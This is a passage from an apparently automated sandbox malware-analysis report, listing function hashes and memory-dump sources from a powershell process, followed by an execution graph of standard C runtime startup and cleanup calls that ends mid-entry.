                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5f4c808ec606b246e36ffc70440b797548ef27a87758d4579116c6be1f30b4b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8E02631A06306DBC705EFA8D4058EDBFB1EF42200B00819EE949D3312E6311A95DBC0
                                                                                                                                                                                                                                                Function 046BF870 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                                • Instruction ID: ebdb190502718c8453acce9bd532656dfddd2c087411b256561d6fdcf076312f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75D06270D042099F8784EFADC94156DFBF4EB48200F5085AA8959E7311F7315652DBD1
                                                                                                                                                                                                                                                Function 046B8748 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8a658bb30e173bf0b2bdf899c3b6f3e6193f08db0d0ddde5f15f65208e1dbbd2
                                                                                                                                                                                                                                                • Instruction ID: 627c5a3ce1e805142b0660c7a226528ac3a66caf9c3498b17bf9da89e304bc19
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a658bb30e173bf0b2bdf899c3b6f3e6193f08db0d0ddde5f15f65208e1dbbd2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62D01730806209CBCB08ABA4E85A5FDBB34FF10301F4001ADE92B53191EB302A8BCBC0
                                                                                                                                                                                                                                                Function 046B8810 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5f66d8c8fc14f4c9510f9cfa5e4eb72dba27cc2684720e49e9c8ded124c784fa
                                                                                                                                                                                                                                                • Instruction ID: 5a8ee5ccfaa38a6df18d49df1704a611df7cb4ac4e69330ab8bd0bea14a02a60
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f66d8c8fc14f4c9510f9cfa5e4eb72dba27cc2684720e49e9c8ded124c784fa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CD01235A0530ADB8B14EF64D4469ADBBB4EB44201F008159DA5993351EA306841DBC1
                                                                                                                                                                                                                                                Function 046B7932 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6bd4180afd29944d1274e98e1f6e68cf7fd6a729ccc21cbae693a5e249bae147
                                                                                                                                                                                                                                                • Instruction ID: cc55051ac6924b268ef1c62d814bba45be6f94ed2986a6d070246eba353df525
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bd4180afd29944d1274e98e1f6e68cf7fd6a729ccc21cbae693a5e249bae147
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90D0C73404D7C49FC7579FB8D4548593F306E0311534904DED485DF1B3C5668458DB26
                                                                                                                                                                                                                                                Function 046BEA57 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 50726482f491611eda12f223639fbc5a61df3fcc3b0669f9f2dc21edb99ac21a
                                                                                                                                                                                                                                                • Instruction ID: 011b36c82beb592da3344d239aa4eb9d883188ac324156252891125581f12557
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50726482f491611eda12f223639fbc5a61df3fcc3b0669f9f2dc21edb99ac21a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06D09239B45218CFCB04CB94E995ADDF371FF84325F1180A6E5169B251DB32A952CB80
                                                                                                                                                                                                                                                Function 046B7EA0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 24ef4029ede22e8e722aa75e41f2a5ef28b8f93c016e37141346618b832f80ba
                                                                                                                                                                                                                                                • Instruction ID: 9d8bd02c540b42e004a1289cd7103c2ff80b91f2175d3b673aadef5a3214271d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24ef4029ede22e8e722aa75e41f2a5ef28b8f93c016e37141346618b832f80ba
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CC08C1401E3D00EEF43933888991627F714E4302930E40C7C080CE867C428840ACB63
                                                                                                                                                                                                                                                Function 046B7940 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cef5dc95775ea7ca263d87c8a5894f20cf1d874ba8e74c2c06338577e8431e31
                                                                                                                                                                                                                                                • Instruction ID: ef46202ec0f32d106d428d2b0edc27edbca8ebd3ad9722f849883acd11664cdc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cef5dc95775ea7ca263d87c8a5894f20cf1d874ba8e74c2c06338577e8431e31
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60B09230044708CFC258AFB9E8148287729BB406153C004A8E80E0A2928F76E888DA54

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 08743A98 Relevance: .4, Instructions: 373COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1479916663.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_8740000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3566da94789055ddc9f0d9ca6422e781ad2b26091b3825fda2045d154f04fdef
                                                                                                                                                                                                                                                • Instruction ID: 2b91f10618a30094111dbc57ed11707fcd459c81614715964dd75e9419fa343d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3566da94789055ddc9f0d9ca6422e781ad2b26091b3825fda2045d154f04fdef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BE14A707012059FEB14DF65C848BAAB7F1FF84306F10856CD40ADB3A5EB76E9468BA0

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:16.2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:1.5%
                                                                                                                                                                                                                                                Signature Coverage:4.6%
                                                                                                                                                                                                                                                Total number of Nodes:1002
                                                                                                                                                                                                                                                Total number of Limit Nodes:10
                                                                                                                                                                                                                                                execution_graph 11446 6d59725e 11447 6d597269 11446->11447 11448 6d59729c 11446->11448 11450 6d59728e 11447->11450 11451 6d59726e 11447->11451 11485 6d5973b8 11448->11485 11458 6d5972b1 11450->11458 11453 6d597273 11451->11453 11454 6d597284 11451->11454 11457 6d597278 11453->11457 11472 6d59788a 11453->11472 11477 6d59786b 11454->11477 11459 6d5972bd ___scrt_is_nonwritable_in_current_image 11458->11459 11512 6d5978fb 11459->11512 11461 6d5972c4 __DllMainCRTStartup@12 11462 6d5972eb 11461->11462 11463 6d5973b0 11461->11463 11471 6d597327 ___scrt_is_nonwritable_in_current_image _unexpected 11461->11471 11523 6d59785d 11462->11523 11531 6d597a9a IsProcessorFeaturePresent 11463->11531 11466 6d5973b7 11467 6d5972fa __RTC_Initialize 11467->11471 11526 6d59777b InitializeSListHead 11467->11526 11469 6d597308 11469->11471 11527 6d597832 11469->11527 11471->11457 11623 6d59af33 11472->11623 11928 6d59876c 11477->11928 11480 6d597874 11480->11457 11483 6d597887 11483->11457 11484 6d598777 21 API calls 11484->11480 11487 6d5973c4 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11485->11487 11486 6d5973cd 11486->11457 11487->11486 11488 6d597460 11487->11488 11489 6d5973f5 11487->11489 11491 6d597a9a __DllMainCRTStartup@12 4 API calls 11488->11491 11948 6d5978cb 11489->11948 11494 6d597467 ___scrt_is_nonwritable_in_current_image 11491->11494 11492 6d5973fa 11957 6d597787 11492->11957 11496 6d59749d dllmain_raw 11494->11496 11497 6d597498 11494->11497 11509 6d597483 11494->11509 11495 6d5973ff __RTC_Initialize __DllMainCRTStartup@12 11960 6d597a6c 11495->11960 11498 6d5974b7 dllmain_crt_dispatch 11496->11498 11496->11509 11969 6d596c40 11497->11969 11498->11497 11498->11509 11504 6d597509 11505 6d597512 dllmain_crt_dispatch 11504->11505 11504->11509 11507 6d597525 dllmain_raw 11505->11507 11505->11509 11506 6d596c40 __DllMainCRTStartup@12 5 API calls 11508 6d5974f0 11506->11508 11507->11509 11510 6d5973b8 __DllMainCRTStartup@12 81 API calls 11508->11510 11509->11457 11511 6d5974fe dllmain_raw 11510->11511 11511->11504 11513 6d597904 11512->11513 11535 6d597c58 IsProcessorFeaturePresent 11513->11535 11517 6d597915 11518 6d597919 11517->11518 11545 6d59af16 11517->11545 11518->11461 11521 6d597930 11521->11461 11617 6d597934 11523->11617 11525 6d597864 11525->11467 11526->11469 11528 6d597837 ___scrt_release_startup_lock 11527->11528 11529 6d597c58 IsProcessorFeaturePresent 11528->11529 11530 6d597840 11528->11530 11529->11530 11530->11471 11532 6d597ab0 _unexpected 11531->11532 11533 6d597b5b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11532->11533 11534 6d597b9f _unexpected 11533->11534 11534->11466 11536 6d597910 11535->11536 11537 6d59874d 11536->11537 11554 6d598c1c 11537->11554 11540 6d598756 11540->11517 11542 6d59875e 11543 6d598769 11542->11543 11568 6d598c58 11542->11568 11543->11517 11608 6d59da38 11545->11608 11548 6d59877f 11549 6d598788 11548->11549 11550 6d598792 11548->11550 11551 6d598c01 ___vcrt_uninitialize_ptd 6 API calls 11549->11551 11550->11518 11552 6d59878d 11551->11552 11553 6d598c58 ___vcrt_uninitialize_locks DeleteCriticalSection 11552->11553 11553->11550 11555 6d598c25 11554->11555 11557 6d598c4e 11555->11557 11558 6d598752 11555->11558 11572 6d59924c 11555->11572 11559 6d598c58 ___vcrt_uninitialize_locks DeleteCriticalSection 11557->11559 11558->11540 11560 6d598bce 11558->11560 11559->11558 11589 6d59915d 11560->11589 11565 6d598bfe 11565->11542 11567 6d598be3 11567->11542 11569 6d598c82 11568->11569 11570 6d598c63 11568->11570 11569->11540 11571 6d598c6d DeleteCriticalSection 11570->11571 11571->11569 11571->11571 11577 6d599072 11572->11577 11575 6d599284 InitializeCriticalSectionAndSpinCount 11576 6d59926f 11575->11576 11576->11555 11578 6d59908f 11577->11578 11581 6d599093 11577->11581 11578->11575 11578->11576 11579 6d5990fb GetProcAddress 11579->11578 11581->11578 11581->11579 11582 6d5990ec 11581->11582 11584 6d599112 LoadLibraryExW 11581->11584 11582->11579 11583 6d5990f4 FreeLibrary 11582->11583 11583->11579 11585 6d599129 GetLastError 11584->11585 11586 6d599159 11584->11586 11585->11586 11587 6d599134 ___vcrt_FlsSetValue 11585->11587 11586->11581 11587->11586 11588 6d59914a LoadLibraryExW 11587->11588 11588->11581 11590 6d599072 ___vcrt_FlsSetValue 5 API calls 11589->11590 11591 6d599177 11590->11591 11592 6d599190 TlsAlloc 11591->11592 11593 6d598bd8 11591->11593 11593->11567 11594 6d59920e 11593->11594 11595 6d599072 ___vcrt_FlsSetValue 5 API calls 11594->11595 11596 6d599228 11595->11596 11597 6d599243 TlsSetValue 11596->11597 11598 6d598bf1 11596->11598 11597->11598 11598->11565 11599 6d598c01 11598->11599 11600 6d598c11 11599->11600 11601 6d598c0b 11599->11601 11600->11567 11603 6d599198 11601->11603 11604 6d599072 ___vcrt_FlsSetValue 5 API calls 11603->11604 11605 6d5991b2 11604->11605 11606 6d5991ca TlsFree 11605->11606 11607 6d5991be 11605->11607 11606->11607 11607->11600 11609 6d597922 11608->11609 11610 6d59da48 11608->11610 11609->11521 11609->11548 11610->11609 11612 6d59d8fc 11610->11612 11613 6d59d903 11612->11613 11614 6d59d946 GetStdHandle 11613->11614 11615 6d59d9a8 11613->11615 11616 6d59d959 GetFileType 11613->11616 11614->11613 11615->11610 11616->11613 11618 6d597940 11617->11618 11619 6d597944 11617->11619 11618->11525 11620 6d597a9a __DllMainCRTStartup@12 4 API calls 11619->11620 11622 6d597951 ___scrt_release_startup_lock 11619->11622 11621 6d5979ba 11620->11621 11622->11525 11629 6d59b62b 11623->11629 11626 6d598777 11908 6d598b03 11626->11908 11630 6d59b635 11629->11630 11633 6d59788f 11629->11633 11637 6d59d687 11630->11637 11633->11626 11653 6d59d525 11637->11653 11639 6d59d6a3 11640 6d59b63c 11639->11640 11641 6d59d6be TlsGetValue 11639->11641 11640->11633 11642 6d59d6c6 11640->11642 11643 6d59d525 __dosmaperr 5 API calls 11642->11643 11644 6d59d6e2 11643->11644 11645 6d59b64f 11644->11645 11646 6d59d700 TlsSetValue 11644->11646 11647 6d59b4f2 11645->11647 11648 6d59b4fd 11647->11648 11649 6d59b50d 11647->11649 11667 6d59b513 11648->11667 11649->11633 11654 6d59d551 __dosmaperr 11653->11654 11655 6d59d555 11653->11655 11654->11639 11655->11654 11659 6d59d45a 11655->11659 11658 6d59d56f GetProcAddress 11658->11654 11665 6d59d46b ___vcrt_FlsSetValue 11659->11665 11660 6d59d501 11660->11654 11660->11658 11661 6d59d489 LoadLibraryExW 11662 6d59d508 11661->11662 11663 6d59d4a4 GetLastError 11661->11663 11662->11660 11664 6d59d51a FreeLibrary 11662->11664 11663->11665 11664->11660 11665->11660 11665->11661 11666 6d59d4d7 LoadLibraryExW 11665->11666 11666->11662 11666->11665 11668 6d59b528 11667->11668 11669 6d59b52e 11667->11669 11670 6d59bda4 ___free_lconv_mon 14 API calls 11668->11670 11671 6d59bda4 ___free_lconv_mon 14 API calls 11669->11671 11670->11669 11672 6d59b53a 11671->11672 11673 6d59bda4 ___free_lconv_mon 14 API calls 11672->11673 11674 6d59b545 11673->11674 11675 6d59bda4 ___free_lconv_mon 14 API calls 11674->11675 11676 6d59b550 11675->11676 11677 6d59bda4 ___free_lconv_mon 14 API calls 11676->11677 11678 6d59b55b 11677->11678 11679 6d59bda4 ___free_lconv_mon 14 API calls 11678->11679 11680 6d59b566 11679->11680 11681 6d59bda4 ___free_lconv_mon 14 API calls 11680->11681 11682 6d59b571 11681->11682 11683 6d59bda4 ___free_lconv_mon 14 API calls 11682->11683 11684 6d59b57c 11683->11684 11685 6d59bda4 ___free_lconv_mon 14 API calls 11684->11685 11686 6d59b587 11685->11686 11687 6d59bda4 ___free_lconv_mon 14 API calls 11686->11687 11688 6d59b595 11687->11688 11699 6d59b33f 11688->11699 11693 6d59bda4 11694 6d59bdd9 11693->11694 11695 6d59bdaf HeapFree 11693->11695 11694->11649 11695->11694 11696 6d59bdc4 GetLastError 11695->11696 11697 6d59bdd1 __dosmaperr 11696->11697 11839 6d59bd34 11697->11839 11700 6d59b34b ___scrt_is_nonwritable_in_current_image 11699->11700 11715 6d59b983 EnterCriticalSection 11700->11715 11702 6d59b37f 11716 6d59b39e 11702->11716 11705 6d59b355 11705->11702 11706 6d59bda4 ___free_lconv_mon 14 API calls 11705->11706 11706->11702 11707 6d59b3aa 11708 6d59b3b6 ___scrt_is_nonwritable_in_current_image 11707->11708 11720 6d59b983 EnterCriticalSection 11708->11720 11710 6d59b3c0 11721 6d59b5e0 11710->11721 11712 6d59b3d3 11725 6d59b3f3 11712->11725 11715->11705 11719 6d59b9cb LeaveCriticalSection 11716->11719 11718 6d59b38c 11718->11707 11719->11718 11720->11710 11722 6d59b616 __dosmaperr 11721->11722 11723 6d59b5ef __dosmaperr 11721->11723 11722->11712 11723->11722 11728 6d59e63b 11723->11728 11838 6d59b9cb LeaveCriticalSection 11725->11838 11727 6d59b3e1 11727->11693 11729 6d59e6bb 11728->11729 11733 6d59e651 11728->11733 11731 6d59bda4 ___free_lconv_mon 14 API calls 11729->11731 11755 6d59e709 11729->11755 11732 6d59e6dd 11731->11732 11736 6d59bda4 ___free_lconv_mon 14 API calls 11732->11736 11733->11729 11735 6d59e684 11733->11735 11737 6d59bda4 ___free_lconv_mon 14 API calls 11733->11737 11734 6d59e6a6 11739 6d59bda4 ___free_lconv_mon 14 API calls 11734->11739 11735->11734 11743 6d59bda4 ___free_lconv_mon 14 API calls 11735->11743 11738 6d59e6f0 11736->11738 11742 6d59e679 11737->11742 11744 6d59bda4 ___free_lconv_mon 14 API calls 11738->11744 11745 6d59e6b0 11739->11745 11740 6d59e777 11747 6d59bda4 ___free_lconv_mon 14 API calls 11740->11747 11741 6d59e717 11741->11740 11754 6d59bda4 14 API calls ___free_lconv_mon 11741->11754 11756 6d5a05ba 11742->11756 11749 6d59e69b 11743->11749 11750 6d59e6fe 11744->11750 11746 6d59bda4 ___free_lconv_mon 14 API calls 11745->11746 11746->11729 11751 6d59e77d 11747->11751 11784 6d5a06b8 11749->11784 11753 6d59bda4 ___free_lconv_mon 14 API calls 11750->11753 11751->11722 11753->11755 11754->11741 11796 6d59e7ac 11755->11796 11757 6d5a05cb 11756->11757 11783 6d5a06b4 11756->11783 11758 6d5a05dc 11757->11758 11759 6d59bda4 ___free_lconv_mon 14 API calls 11757->11759 11760 6d5a05ee 11758->11760 11761 6d59bda4 ___free_lconv_mon 14 API calls 11758->11761 11759->11758 11762 6d5a0600 11760->11762 11764 6d59bda4 ___free_lconv_mon 14 API calls 11760->11764 11761->11760 11763 6d5a0612 11762->11763 11765 6d59bda4 ___free_lconv_mon 14 API calls 11762->11765 11766 6d5a0624 11763->11766 11767 6d59bda4 ___free_lconv_mon 14 API calls 11763->11767 11764->11762 11765->11763 11768 6d59bda4 ___free_lconv_mon 14 API calls 11766->11768 11769 6d5a0636 11766->11769 11767->11766 11768->11769 11771 6d5a0648 11769->11771 11772 6d59bda4 ___free_lconv_mon 14 API calls 11769->11772 11770 6d5a065a 11774 6d5a066c 11770->11774 11775 6d59bda4 ___free_lconv_mon 14 API calls 11770->11775 11771->11770 11773 6d59bda4 ___free_lconv_mon 14 API calls 11771->11773 11772->11771 11773->11770 11776 6d5a067e 11774->11776 11777 6d59bda4 ___free_lconv_mon 14 API calls 11774->11777 11775->11774 11778 6d5a0690 11776->11778 11780 6d59bda4 ___free_lconv_mon 14 API calls 11776->11780 11777->11776 11779 6d5a06a2 11778->11779 11781 6d59bda4 ___free_lconv_mon 14 API calls 11778->11781 11782 6d59bda4 ___free_lconv_mon 14 API calls 11779->11782 11779->11783 11780->11778 11781->11779 11782->11783 11783->11735 11785 6d5a071d 11784->11785 11786 6d5a06c5 11784->11786 11785->11734 11787 6d5a06d5 11786->11787 11788 6d59bda4 ___free_lconv_mon 14 API calls 11786->11788 11789 6d5a06e7 11787->11789 11790 6d59bda4 ___free_lconv_mon 14 API calls 11787->11790 11788->11787 11791 6d5a06f9 11789->11791 11792 6d59bda4 ___free_lconv_mon 14 API calls 11789->11792 11790->11789 11793 6d5a070b 11791->11793 11794 6d59bda4 ___free_lconv_mon 14 API calls 11791->11794 11792->11791 11793->11785 11795 6d59bda4 ___free_lconv_mon 14 API calls 11793->11795 11794->11793 11795->11785 11797 6d59e7b9 11796->11797 11798 6d59e7d8 11796->11798 11797->11798 11802 6d5a0746 11797->11802 11798->11741 11801 6d59bda4 ___free_lconv_mon 14 API calls 11801->11798 11803 6d59e7d2 11802->11803 11804 6d5a0757 11802->11804 11803->11801 11805 6d5a0721 __dosmaperr 14 API calls 11804->11805 11806 6d5a075f 11805->11806 11807 6d5a0721 __dosmaperr 14 API calls 11806->11807 11808 6d5a076a 11807->11808 11809 6d5a0721 __dosmaperr 14 API calls 11808->11809 11810 6d5a0775 11809->11810 11811 6d5a0721 __dosmaperr 14 API calls 11810->11811 11812 6d5a0780 11811->11812 11813 6d5a0721 __dosmaperr 14 API calls 11812->11813 11814 6d5a078e 11813->11814 11815 6d59bda4 ___free_lconv_mon 14 API calls 11814->11815 11816 6d5a0799 11815->11816 11817 6d59bda4 ___free_lconv_mon 14 API calls 11816->11817 11818 6d5a07a4 11817->11818 11819 6d59bda4 ___free_lconv_mon 14 API calls 11818->11819 11820 6d5a07af 11819->11820 11821 6d5a0721 __dosmaperr 14 API calls 11820->11821 11822 6d5a07bd 11821->11822 11823 6d5a0721 __dosmaperr 14 API calls 11822->11823 11824 6d5a07cb 11823->11824 11825 6d5a0721 __dosmaperr 14 API calls 11824->11825 11826 6d5a07dc 11825->11826 11827 6d5a0721 __dosmaperr 14 API calls 11826->11827 11828 6d5a07ea 11827->11828 11829 6d5a0721 __dosmaperr 14 API calls 11828->11829 11830 6d5a07f8 11829->11830 11831 6d59bda4 ___free_lconv_mon 14 API calls 11830->11831 11832 6d5a0803 11831->11832 11833 6d59bda4 ___free_lconv_mon 14 API calls 11832->11833 11834 6d5a080e 11833->11834 11835 6d59bda4 ___free_lconv_mon 14 API calls 11834->11835 11836 6d5a0819 11835->11836 11837 6d59bda4 ___free_lconv_mon 14 API calls 11836->11837 11837->11803 11838->11727 11842 6d59b7a8 GetLastError 11839->11842 11841 6d59bd39 11841->11694 11843 6d59b7c4 11842->11843 11844 6d59b7be 11842->11844 11846 6d59d6c6 __dosmaperr 6 API calls 11843->11846 11848 6d59b7c8 SetLastError 11843->11848 11845 6d59d687 __dosmaperr 6 API calls 11844->11845 11845->11843 11847 6d59b7e0 11846->11847 11847->11848 11865 6d59bd47 11847->11865 11848->11841 11852 6d59b7fd 11854 6d59d6c6 __dosmaperr 6 API calls 11852->11854 11853 6d59b80e 11855 6d59d6c6 __dosmaperr 6 API calls 11853->11855 11856 6d59b80b 11854->11856 11857 6d59b81a 11855->11857 11862 6d59bda4 ___free_lconv_mon 12 API calls 11856->11862 11858 6d59b81e 11857->11858 11859 6d59b835 11857->11859 11861 6d59d6c6 __dosmaperr 6 API calls 11858->11861 11872 6d59b459 11859->11872 11861->11856 11862->11848 11864 6d59bda4 ___free_lconv_mon 12 API calls 11864->11848 11870 6d59bd54 __dosmaperr 11865->11870 11866 6d59bd94 11869 6d59bd34 __dosmaperr 13 API calls 11866->11869 11867 6d59bd7f HeapAlloc 11868 6d59b7f5 11867->11868 11867->11870 11868->11852 11868->11853 11869->11868 11870->11866 11870->11867 11877 6d59dae0 11870->11877 11886 6d59b2ed 11872->11886 11880 6d59db0c 11877->11880 11881 6d59db18 ___scrt_is_nonwritable_in_current_image 11880->11881 11882 6d59b983 _unexpected EnterCriticalSection 11881->11882 11883 6d59db23 _unexpected 11882->11883 11884 6d59db5a __dosmaperr LeaveCriticalSection 11883->11884 11885 6d59daeb 11884->11885 11885->11870 11887 6d59b2f9 ___scrt_is_nonwritable_in_current_image 11886->11887 11900 6d59b983 EnterCriticalSection 11887->11900 11889 6d59b303 11901 6d59b333 11889->11901 11892 6d59b3ff 11893 6d59b40b ___scrt_is_nonwritable_in_current_image 11892->11893 11904 6d59b983 EnterCriticalSection 11893->11904 11895 6d59b415 11896 6d59b5e0 __dosmaperr 14 API calls 11895->11896 11897 6d59b42d 11896->11897 11905 6d59b44d 11897->11905 11900->11889 11902 6d59b9cb _unexpected LeaveCriticalSection 11901->11902 11903 6d59b321 11902->11903 11903->11892 11904->11895 11906 6d59b9cb _unexpected LeaveCriticalSection 11905->11906 11907 6d59b43b 11906->11907 11907->11864 11909 6d597894 11908->11909 11910 6d598b0d 11908->11910 11909->11457 11916 6d5991d3 11910->11916 11913 6d59920e ___vcrt_FlsSetValue 6 API calls 11914 6d598b23 11913->11914 11921 6d598ae7 11914->11921 11917 6d599072 ___vcrt_FlsSetValue 5 API calls 11916->11917 11918 6d5991ed 11917->11918 11919 6d599205 TlsGetValue 11918->11919 11920 6d598b14 11918->11920 11919->11920 11920->11913 11922 6d598afe 11921->11922 11923 6d598af1 11921->11923 11922->11909 11923->11922 11925 6d59afb9 11923->11925 11926 6d59bda4 ___free_lconv_mon 14 API calls 11925->11926 11927 6d59afd1 11926->11927 11927->11922 11934 6d598b3c 11928->11934 11930 6d597870 11930->11480 11931 6d59af28 11930->11931 11932 6d59b7a8 __dosmaperr 14 API calls 11931->11932 11933 6d59787c 11932->11933 11933->11483 11933->11484 11935 6d598b48 GetLastError 11934->11935 11936 6d598b45 11934->11936 11937 6d5991d3 ___vcrt_FlsGetValue 6 API calls 11935->11937 11936->11930 11938 6d598b5d 11937->11938 11939 6d598bc2 SetLastError 11938->11939 11940 6d59920e ___vcrt_FlsSetValue 6 API calls 11938->11940 11947 6d598b7c 11938->11947 11939->11930 11941 6d598b76 _unexpected 11940->11941 11942 6d598b9e 11941->11942 11944 6d59920e ___vcrt_FlsSetValue 6 API calls 11941->11944 11941->11947 11943 6d59920e ___vcrt_FlsSetValue 6 API calls 11942->11943 11945 6d598bb2 11942->11945 11943->11945 11944->11942 11946 6d59afb9 ___std_exception_destroy 14 API calls 11945->11946 11946->11947 11947->11939 11949 6d5978d0 ___scrt_release_startup_lock 11948->11949 11950 6d5978d4 11949->11950 11954 6d5978e0 __DllMainCRTStartup@12 11949->11954 11973 6d59ad92 11950->11973 11952 6d5978de 11952->11492 11953 6d5978ed 11953->11492 11954->11953 11977 6d59a57b 11954->11977 12046 6d59872a InterlockedFlushSList 11957->12046 11961 6d597a78 11960->11961 11962 6d59741e 11961->11962 12050 6d59af3b 11961->12050 11966 6d59745a 11962->11966 11964 6d597a86 11965 6d59877f ___scrt_uninitialize_crt 7 API calls 11964->11965 11965->11962 12149 6d5978ee 11966->12149 11970 6d596c9c 11969->11970 12166 6d597250 11970->12166 11972 6d597211 11972->11504 11972->11506 11974 6d59ad9e __EH_prolog3 11973->11974 11988 6d59ac5d 11974->11988 11976 6d59adc5 __DllMainCRTStartup@12 11976->11952 11978 6d59a5a8 11977->11978 11986 6d59a5b9 11977->11986 12005 6d59a643 GetModuleHandleW 11978->12005 11983 6d59a5f7 11983->11492 12012 6d59a42b 11986->12012 11989 6d59ac69 